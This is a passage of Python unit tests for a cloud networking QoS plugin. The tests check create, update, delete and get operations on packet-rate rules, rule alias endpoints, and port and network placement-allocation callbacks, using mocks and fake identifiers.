setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.update_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_packet_rate_limit_rule(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [self.pps_rule])
self.qos_plugin.delete_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_pps_rule_bad_policy(self):
_policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
setattr(_policy, "rules", [])
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, _policy.id)
def test_get_policy_packet_rate_limit_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_packet_rate_limit_rule(
self.ctxt, self.pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(self.ctxt,
id=self.pps_rule.id)
def test_get_policy_packet_rate_limit_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosPacketRateLimitRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_packet_rate_limit_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_packet_rate_limit_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_policy_packet_rate_limit_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
def test_delete_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_PACKET_RATE_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
def test_create_min_pps_rule_on_bound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, self.rule_data)
def test_create_min_pps_rule_on_unbound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, _policy.id, self.rule_data)
except NotImplementedError:
self.fail()
def test_create_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
setattr(_policy, "rules", [self.min_pps_rule])
rules = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
for new_rule_data in rules:
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
for rule_data in rules:
min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **rule_data['minimum_packet_rate_rule'])
setattr(_policy, "rules", [min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_create_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_min_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
new_rule_data = {
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 1234,
'direction': self.min_pps_rule.direction,
},
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
rules_data = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
for rule_data in rules_data:
rules = [
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[0]['minimum_packet_rate_rule']),
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[1]['minimum_packet_rate_rule']),
]
setattr(_policy, 'rules', rules)
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, rule_data['minimum_packet_rate_rule']['id'],
self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_update_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_update_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.delete_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, _policy.id)
def test_delete_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(
self.ctxt, id=self.min_pps_rule.id)
def test_get_policy_min_pps_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_min_pps_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rules,
self.ctxt, self.policy.id)
def test_get_min_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'min_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
self.assertEqual(
qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_min_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
class QoSRuleAliasTestExtensionManager(object):
def get_resources(self):
return qos_rules_alias.Qos_rules_alias.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class QoSRuleAliasMinimumPacketRateTestExtensionManager(object):
def get_resources(self):
return qos_pps_minimum_rule_alias.Qos_pps_minimum_rule_alias.\
get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestQoSRuleAlias(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'bandwidth_limit': rule_object.QosBandwidthLimitRule,
'dscp_marking': rule_object.QosDscpMarkingRule,
'minimum_bandwidth': rule_object.QosMinimumBandwidthRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'bandwidth_limit_rule': {'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'dscp_mark': 16},
'minimum_bandwidth_rule': {'min_kbps': 10}
}
def _update_rule(self, rule_type, rule_id, **kwargs):
data = {'alias_%s_rule' % rule_type: kwargs}
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_update_request(resource, data, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _show_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _delete_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_delete_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
@mock.patch.object(qos_plugin.QoSPlugin, "update_policy_rule")
def test_update_rule(self, update_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._update_rule(rule_type, rule_id, **data)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id, {rule_data_name: data}))
update_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "get_policy_rule")
def test_show_rule(self, get_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=rule):
self._show_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
get_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "delete_policy_rule")
def test_delete_rule(self, delete_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._delete_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
delete_policy_rule_mock.assert_has_calls(calls, any_order=True)
def test_show_non_existing_rule(self):
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=None):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPNotFound.code, res.status_int)
class TestQoSRuleAliasMinimumPacketRate(TestQoSRuleAlias):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasMinimumPacketRateTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'minimum_packet_rate': rule_object.QosMinimumPacketRateRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'minimum_packet_rate_rule': {'min_kpps': 10, 'direction': 'any'}
}
class TestQosPluginDB(base.BaseQosTestCase):
PORT_ID = 'f02f160e-1612-11ec-b2b8-bf60ab98186c'
QOS_MIN_BW_RULE_ID = '8bf8eb46-160e-11ec-8024-9f96be32099d'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 8bf8eb46-160e-11ec-8024-9f96be32099d
MIN_BW_REQUEST_GROUP_UUID = 'c8bc1b27-59a1-5135-aa33-aeecad6093f4'
MIN_BW_RP = 'd7bea120-1626-11ec-9148-c32debfcf0f6'
QOS_MIN_PPS_RULE_ID = '6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb
MIN_PPS_REQUEST_GROUP_UUID = '995008f4-f120-547a-b051-428b89076067'
MIN_PPS_RP = 'e16161f4-1626-11ec-a5a2-1fc9396e27cc'
def setUp(self):
super(TestQosPluginDB, self).setUp()
self.setup_coreplugin(load_plugins=False)
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.context = context.get_admin_context()
self.project_id = uuidutils.generate_uuid()
def _make_qos_policy(self):
qos_policy = policy_object.QosPolicy(
self.context, project_id=self.project_id, shared=False,
is_default=False)
qos_policy.create()
return qos_policy
def _make_qos_minbw_rule(self, policy_id, direction='ingress',
min_kbps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumBandwidthRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kbps=min_kbps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_qos_minpps_rule(self, policy_id, direction='ingress',
min_kpps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumPacketRateRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kpps=min_kpps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_port(self, network_id, qos_policy_id=None, port_id=None,
qos_network_policy_id=None, device_owner=None):
port_id = port_id if port_id else uuidutils.generate_uuid()
base_mac = ['aa', 'bb', 'cc', 'dd', 'ee', 'ff']
mac = netaddr.EUI(next(net_utils.random_mac_generator(base_mac)))
device_owner = device_owner if device_owner else '3'
port = ports_object.Port(
self.context, network_id=network_id, device_owner=device_owner,
project_id=self.project_id, admin_state_up=True, status='DOWN',
device_id='2', qos_policy_id=qos_policy_id,
qos_network_policy_id=qos_network_policy_id, mac_address=mac,
id=port_id)
port.create()
return port
def _make_network(self, qos_policy_id=None):
network = network_object.Network(self.context,
qos_policy_id=qos_policy_id)
network.create()
return network
def _test_validate_create_network_callback(self, network_qos=False):
net_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
kwargs = {"context": self.context,
"network": network}
with mock.patch.object(self.qos_plugin,
'validate_policy_for_network') \
as mock_validate_policy:
self.qos_plugin._validate_create_network_callback(
"NETWORK", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context, resource_id=kwargs['network']['id'],))
qos_policy = None
if network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, network.id)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_network_callback(self):
self._test_validate_create_network_callback(network_qos=True)
def test_validate_create_network_callback_no_qos(self):
self._test_validate_create_network_callback(network_qos=False)
def _test_validate_create_port_callback(self, port_qos=False,
network_qos=False):
net_qos_obj = self._make_qos_policy()
port_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
port_qos_id = port_qos_obj.id if port_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
port = self._make_port(network.id, qos_policy_id=port_qos_id)
kwargs = {"context": self.context,
"port": {"id": port.id}}
with mock.patch.object(self.qos_plugin, 'validate_policy_for_port') \
as mock_validate_policy:
self.qos_plugin._validate_create_port_callback(
"PORT", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context,
resource_id=kwargs['port']['id'],))
qos_policy = None
if port_qos:
qos_policy = port_qos_obj
elif network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, port)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_port_callback_policy_on_port(self):
self._test_validate_create_port_callback(port_qos=True)
def test_validate_create_port_callback_policy_on_port_and_network(self):
self._test_validate_create_port_callback(port_qos=True,
network_qos=True)
def test_validate_create_port_callback_policy_on_network(self):
self._test_validate_create_port_callback(network_qos=True)
def test_validate_create_port_callback_no_policy(self):
self._test_validate_create_port_callback()
def _prepare_for_port_placement_allocation_change(self, qos1, qos2,
qos_network_policy=None):
qos1_id = qos1.id if qos1 else None
qos2_id = qos2.id if qos2 else None
qos_network_policy_id = (
qos_network_policy.id if qos_network_policy else None)
network = self._make_network(qos_policy_id=qos_network_policy_id)
port = self._make_port(
network.id, qos_policy_id=qos1_id, port_id=TestQosPluginDB.PORT_ID)
return {"context": self.context,
"original_port": {
"id": port.id,
"device_owner": "compute:uu:id",
"qos_policy_id": qos1_id,
"qos_network_policy_id": qos_network_policy_id},
"port": {"id": port.id, "qos_policy_id": qos2_id}}
def test_check_port_for_placement_allocation_change_no_qos_change(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos1_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change(self):
qos1_obj = self._make_qos_policy()
qos2_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos2_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, qos2_obj, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_new_policy(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, None, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_qos_update(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
kwargs['port'].pop('qos_policy_id')
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change_qos_network_policy(
self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=None, qos2=desired_qos, qos_network_policy=qos_network)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos_network, desired_qos, kwargs['original_port'], port)
def test_check_network_for_placement_allocation_change_no_qos_change(self):
qos1 = self._make_qos_policy()
original_network = self._make_network(qos1.id)
network = original_network
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_no_ports_to_update(
self):
original_qos = self._make_qos_policy()
